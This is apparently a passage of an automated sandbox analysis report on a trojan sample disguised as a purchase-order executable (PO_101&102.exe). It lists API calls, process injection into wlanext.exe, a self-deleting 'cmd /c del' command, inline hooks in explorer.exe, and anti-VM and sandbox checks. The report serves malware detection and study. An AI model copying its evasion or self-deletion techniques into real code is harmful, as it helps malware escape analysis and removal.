          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B9670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010B96D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032296D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0322A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032299D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0322B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032298A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032298F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0322A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0322A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032297A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0322AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_03229560 NtWriteFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_032295F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008EA360 NtCreateFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008EA490 NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008EA410 NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008EA540 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008EA48B NtClose,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008EA40D NtReadFile,
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008EA53C NtAllocateVirtualMemory,
          Source: PO_101&102.exeBinary or memory string: OriginalFilename vs PO_101&102.exe
          Source: PO_101&102.exe, 00000001.00000000.271922534.0000000000532000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamerfNVoNr.exe4 vs PO_101&102.exe
          Source: PO_101&102.exe, 00000001.00000002.297143567.0000000006E60000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameBunifu.UI.dll4 vs PO_101&102.exe
          Source: PO_101&102.exe, 00000001.00000002.294074675.00000000029EB000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameMajorRevision.exe< vs PO_101&102.exe
          Source: PO_101&102.exeBinary or memory string: OriginalFilename vs PO_101&102.exe
          Source: PO_101&102.exe, 00000009.00000002.348426415.0000000000DB9000.00000004.00000020.sdmpBinary or memory string: OriginalFilenamewlanext.exej% vs PO_101&102.exe
          Source: PO_101&102.exe, 00000009.00000000.289871341.0000000000642000.00000002.00020000.sdmpBinary or memory string: OriginalFilenamerfNVoNr.exe4 vs PO_101&102.exe
          Source: PO_101&102.exe, 00000009.00000002.348907835.00000000012FF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs PO_101&102.exe
          Source: PO_101&102.exeBinary or memory string: OriginalFilenamerfNVoNr.exe4 vs PO_101&102.exe
          Source: PO_101&102.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\PO_101&102.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\PO_101&102.exe 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess created: C:\Users\user\Desktop\PO_101&102.exe {path}
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess created: C:\Users\user\Desktop\PO_101&102.exe {path}
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: C:\Users\user\Desktop\PO_101&102.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO_101&102.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@4/2
          Source: C:\Users\user\Desktop\PO_101&102.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: PO_101&102.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4008:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\PO_101&102.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: PO_101&102.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: PO_101&102.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: PO_101&102.exe, 00000009.00000002.348548606.0000000001050000.00000040.00000001.sdmp, wlanext.exe, 0000000D.00000002.543166274.00000000032DF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: PO_101&102.exe, wlanext.exe
          Source: Binary string: wlanext.pdb source: PO_101&102.exe, 00000009.00000002.348426415.0000000000DB9000.00000004.00000020.sdmp
          Source: Binary string: wlanext.pdbGCTL source: PO_101&102.exe, 00000009.00000002.348426415.0000000000DB9000.00000004.00000020.sdmp
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_00534FA2 push 00000000h; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_073192DD push FFFFFF8Bh; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088B3CEC push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_088BAC05 push ds; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041EA41 push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00407B2B pushfd ; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041ABC6 push edx; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00417C75 push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_004164E9 push ebx; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041D4B5 push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041656B push esp; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041D56C push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041D502 push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041D50B push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041DD3A push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0041D5A6 push eax; ret
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00403633 push eax; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00644FA2 push 00000000h; iretd
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010CD0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_0323D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008EEA41 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008EABC6 push edx; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008D7B2B pushfd ; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008ED4B5 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008E64E9 push ebx; iretd
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008E7C75 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008ED5A6 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008ED50B push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008ED502 push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008ED56C push eax; ret
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 13_2_008E656B push esp; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.43356279731

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEA
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: /c del 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: C:\Windows\SysWOW64\wlanext.exeProcess created: /c del 'C:\Users\user\Desktop\PO_101&102.exe'
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: Process Memory Space: PO_101&102.exe PID: 7068, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: PO_101&102.exe, 00000001.00000002.293938102.00000000028C0000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: PO_101&102.exe, 00000001.00000002.293938102.00000000028C0000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\PO_101&102.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO_101&102.exeRDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000008D9904 second address: 00000000008D990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\wlanext.exeRDTSC instruction interceptor: First address: 00000000008D9B7E second address: 00000000008D9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\PO_101&102.exe TID: 7072Thread sleep time: -30000s >= -30000s
          Source: C:\Users\user\Desktop\PO_101&102.exe TID: 7120Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 1964Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 6792Thread sleep time: -42000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\PO_101&102.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 1_2_0053985B sgdt fword ptr [eax]
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\PO_101&102.exeThread delayed: delay time: 30000
          Source: C:\Users\user\Desktop\PO_101&102.exeThread delayed: delay time: 922337203685477
          Source: PO_101&102.exe, 00000001.00000002.293938102.00000000028C0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
          Source: explorer.exe, 0000000A.00000000.326896307.00000000047D0000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: explorer.exe, 0000000A.00000000.318948809.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: PO_101&102.exe, 00000001.00000002.293938102.00000000028C0000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000A.00000000.305586847.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: PO_101&102.exe, 00000001.00000002.293938102.00000000028C0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PO_101&102.exe, 00000001.00000002.293938102.00000000028C0000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 0000000A.00000000.299282553.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000A.00000000.318948809.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 0000000A.00000000.299282553.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: PO_101&102.exe, 00000001.00000002.293938102.00000000028C0000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: PO_101&102.exe, 00000001.00000002.293938102.00000000028C0000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: PO_101&102.exe, 00000001.00000002.293938102.00000000028C0000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: PO_101&102.exe, 00000001.00000002.293938102.00000000028C0000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: PO_101&102.exe, 00000001.00000002.293938102.00000000028C0000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 0000000A.00000000.318948809.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_00409AB0 rdtsc
          Source: C:\Users\user\Desktop\PO_101&102.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01079100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01079100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01079100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01094120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01094120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01094120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01094120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01094120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0109C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010AA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A4190 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0107B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_011041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01144015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_01144015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_0108B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\PO_101&102.exeCode function: 9_2_010A002D mov eax, dword ptr fs:[00000030h]
